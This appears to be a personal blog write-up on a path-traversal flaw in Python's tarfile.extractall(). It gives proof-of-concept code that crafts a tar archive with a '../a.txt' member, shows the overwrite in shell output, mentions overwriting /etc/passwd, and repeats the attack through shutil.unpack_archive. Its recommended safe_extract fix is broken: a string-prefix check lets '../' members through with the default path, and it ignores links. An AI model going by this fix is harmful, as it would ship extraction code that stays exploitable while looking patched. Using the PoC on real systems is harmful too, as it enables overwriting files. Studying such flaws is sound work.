Kevin K Kien

Vulnerability with function tarfile.extractall()

28 Oct 2024

Summary

During learning about CodeQL, I found function tarfile.extractall() perform extract file tar. However, when i research further about this function, i found vulnerability arbitrary write file in the system.

Example: File poc.tar have 1 file name ../../../etc/passwd when perform extract file poc.tar then file /etc/passwd in the system able overwrite if user use root permission.

POC

To prove this vulnerability, i will write poc with python perform extract file and overwrite 1 file a.txt with content “hacked!!!”. I will create a file a.txt in the folder ahihi/a.txt.

mkdir ahihi
echo "file a.txt" > ahihi/a.txt
ubuntu@ip-172-31-22-90:$ cat ahihi/a.txt 
file a.txt

Create file poc.tar include file name ../a.txt

import os
import tarfile

# Create a file name with '../a.txt'
with tarfile.open('poc.tar', 'w') as tar:
    # create temporary file
    with open('evil_file.txt', 'w') as f:
        f.write('hacked!!!')

    # add file `../a.txt` in to tar file
    tar.add('evil_file.txt', arcname='../a.txt')

Now, i have a file poc.tar, so i will process code python perform extract file poc.tar and check content file a.txt in the ahihi folder.

import os
import tarfile

extract_dir = '.'
os.makedirs(extract_dir, exist_ok=True)

print(f"Before extraction, does 'a.txt' exist? {'a.txt' in os.listdir('..')}")

with tarfile.open('poc.tar', 'r') as tar:
    tar.extractall(path=extract_dir)

print(f"After extraction, was 'a.txt' overwritten? {'a.txt' in os.listdir('..')}")

Run file poc.py

ubuntu@ip-172-31-22-90:ahihi/poc$ python3 poc.py 
Before extraction, does 'a.txt' exist? True
After extraction, was 'a.txt' overwritten? True

I will check file ahihi/a.txt content:

ubuntu@ip-172-31-22-90:ahihi/poc$ cat ../a.txt 
hacked!!!

well, done!!!

Recommend: When use function tarfile.extractall() to extract tar file, you should use a safe function:

import os
import tarfile

def safe_extract(tar, path=".", members=None):
    for member in tar.getmembers():
        member_path = os.path.join(path, member.name)
        if not os.path.commonprefix([path, member_path]) == path:
            raise Exception("Attempted Path Traversal in Tar File")
    tar.extractall(path, members=members)

# use safe_extract instead extractall
with tarfile.open(filename) as tar:
    safe_extract(tar, extract_dir)

Library shutil in the Python

Library shutil also use function tarfile.extractall() to extract file tar. I will use function shutil.unpack_archive to exploit.

import os
import shutil

extract_dir = '.'
os.makedirs(extract_dir, exist_ok=True)

# Use shutil.unpack_archive to extract file
shutil.unpack_archive('malicious.tar', extract_dir)

print(f"After extraction, was 'a.txt' overwritten? {'a.txt' in os.listdir('..')}")